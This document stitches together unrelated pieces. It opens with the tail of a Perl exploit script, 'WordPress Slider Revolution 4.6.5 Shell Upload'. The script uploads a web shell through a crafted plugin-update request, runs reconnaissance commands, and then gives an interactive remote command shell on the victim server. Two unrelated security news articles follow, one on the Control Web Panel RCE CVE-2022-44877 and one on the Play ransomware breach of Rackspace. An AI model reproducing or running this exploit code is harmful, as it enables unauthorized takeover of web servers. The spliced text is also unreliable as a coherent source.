'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',  
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',  
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',  
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',  
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'  
);  
my $random = $array[rand @array];  
return($random);  
}  
my $useragent = randomagent();

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });  
$ua->timeout(10);  
$ua->agent($useragent);  
my $status = $ua->get("$host/$target");  
unless ($status->is_success) {  
banner();  
print "[-] Xploit failed: " . $status->status_line . "\n";  
exit;  
}

banner();  
print "[*] Target set to $plugin\n";  
print "[*] MorXploiting $host\n";

my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);

print "[*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) {  
print "[+] Payload successfully executed\n";  
}

elsif ($exploit->decoded_content =~ /Wrong request/) {  
print "[-] Payload failed: Not vulnerable\n";  
exit;  
}

elsif ($exploit->decoded_content =~ m/0$/) {  
print "[-] Payload failed: Plugin unavailable\n";  
exit;  
}

else {  
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;  
print "[-] Payload failed:$1\n";  
print "[-] " . $exploit->decoded_content unless (defined $1);  
print "\n";  
exit;  
}

print "[*] Checking if shell was uploaded\n";

sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }  
my $rndstr = rndstr(8, 1..9, 'a'..'z');  
my $cmd1 = encode_base64("echo $rndstr");  
my $status = $ua->get("$host/$shell?cmd=$cmd1");

if ($status->decoded_content =~ /system has been disabled/) {  
print "[-] Xploit failed: system() has been disabled\n";  
exit;  
}

elsif ($status->decoded_content !~ /$rndstr/) {  
print "[-] Xploit failed: " . $status->status_line . "\n";  
exit;  
}

elsif ($status->decoded_content =~ /$rndstr/) {  
print "[+] Shell successfully uploaded\n";  
}  
my $cmd2 = encode_base64("whoami");  
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");  
my $cmd3 = encode_base64("uname -n");  
my $uname = $ua->get("$host/$shell?cmd=$cmd3");  
my $cmd4 = encode_base64("id");  
my $id = $ua->get("$host/$shell?cmd=$cmd4");  
my $cmd5 = encode_base64("uname -a");  
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");  
print $unamea->decoded_content;   
print $id->decoded_content;  
my $wa = $whoami->decoded_content;  
my $un = $uname->decoded_content;  
chomp($wa);  
chomp($un);

while () {  
print "\n$wa\@$un:~\$ ";  
chomp(my $cmd=<STDIN>);  
if ($cmd eq "exit")   
{   
print "Aurevoir!\n";  
exit;  
}  
my $ucmd = encode_base64("$cmd");  
my $output = $ua->get("$host/$shell?cmd=$ucmd");  
print $output->decoded_content;  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |  
                                                                                                                                      |  
=======================================================================================================================================

WordPress Slider Revolution 4.6.5 Shell Upload

Vendor patched the vulnerability in October after a red team alert

Adam Bannister 06 January 2023 at 15:40 UTC

Vendor patched the vulnerability in October after a red team alert

A pre-authentication remote code execution (RCE) exploit has landed for popular web hosting platform Control Web Panel (CWP).

The corresponding vulnerability in CWP 7 was patched and then released in version 0.9.8.1147 on October 25. All previous versions are affected.

CWP, formerly CentOS Web Panel, is a free-to-use, Linux control panel with roughly 200,000 servers in active use.

DON’T MISS Tell us what you think of The Daily Swig to be in with a chance of winning Burp Suite swag

The Proof of Concept (PoC) was posted to GitHub and YouTube yesterday (January 5) by Numan Türle, security engineer at Turkish infosec outfit Gais Security.

Türle told The Daily Swig that he disclosed technical details and requested a CVE after receiving assurances that a sufficient number of servers had been updated to the patched version.

The flaw has now been designated as CVE-2022-44877 with a CVSS severity rating still pending.

**Double quotes problem**

The flaw resides in the component and allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.

According to Türle, it resulted from CWP using the following structure to log incorrect entries:

“Since the request URI comes from the user, and as you can see it is within double quotes, it is possible to run commands such as , which is a bash feature,” he said.

“They have made the request URI into , but double quotes are interpreted on the bash side. It is actually just a problem with double quotes. It was a small problem but could be very annoying.”

**Timeline**

Türle said the bug emerged from zero-day research undertaken on third-party applications used by customers of Gais Security.

“We discovered this vulnerability in July 2022 and closed the ports by first notifying our customers,” he said.

CWP was notified and remediation began on July 30. “Since it was a busy period, we sent the full report to the CWP team on 22.10.2022. The CWP team submitted a special version within two days and we confirmed that we were able to reproduce the vulnerability and submitted a new report.”

Türle praised CWP’s security team for a “very fast fix”.

“While vulnerabilities that I have previously communicated to other companies can take almost one to three months, the CWP team closed the vulnerability in two days,” he added.

The Daily Swig has contacted CWP for comment and will update this article accordingly if they do so.

YOU MAY ALSO LIKE Tesla tackles CORS misconfigurations that left internal networks vulnerable

Exploit drops for remote code execution bug in Control Web Panel 

Cloud services provider Rackspace on Thursday confirmed that the ransomware gang known as Play was responsible for last month's breach.
The security incident, which took place on December 2, 2022, leveraged a previously unknown security exploit to gain initial access to the Rackspace Hosted Exchange email environment.
"This zero-day exploit is associated with CVE-2022-41080," the Texas-based

Cloud Security / Cyber Threat

Cloud services provider Rackspace on Thursday confirmed that the ransomware gang known as **Play** was responsible for last month's breach.

The security incident, which took place on December 2, 2022, leveraged a previously unknown security exploit to gain initial access to the Rackspace Hosted Exchange email environment.

"This zero-day exploit is associated with CVE-2022-41080," the Texas-based company said. "Microsoft disclosed CVE-2022-41080 as a privilege escalation vulnerability and did not include notes for being part of a remote code execution chain that was exploitable."

Rackspace's forensic investigation found that the threat actor accessed the Personal Storage Table (.PST) of 27 customers out of nearly 30,000 customers on the Hosted Exchange email environment.

However, the company said there is no evidence the adversary viewed, misused, or distributed the customer's emails or data from those personal storage folders. It further said it intends to retire its Hosted Exchange platform as part of a planned migration to Microsoft 365.

It's not currently not known if Rackspace paid a ransom to the cybercriminals, but the disclosure follows a report from CrowdStrike last month that shed light on the new technique, dubbed OWASSRF, employed by the Play ransomware actors.

The mechanism targets Exchange servers that are unpatched against the ProxyNotShell vulnerabilities (CVE-2022-41040 and CVE-2022-41082) but have in place URL rewrite mitigations for the Autodiscover endpoint.

This involves an exploit chain comprising CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution in a manner that bypasses the blocking rules through Outlook Web Access (OWA). The flaws were addressed by Microsoft in November 2022.

The Windows maker, in a statement shared with The Hacker News, urged customers to prioritize installing its November 2022 Exchange Server updates and that the reported method targets vulnerable systems that have not not applied the latest fixes.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#zero_day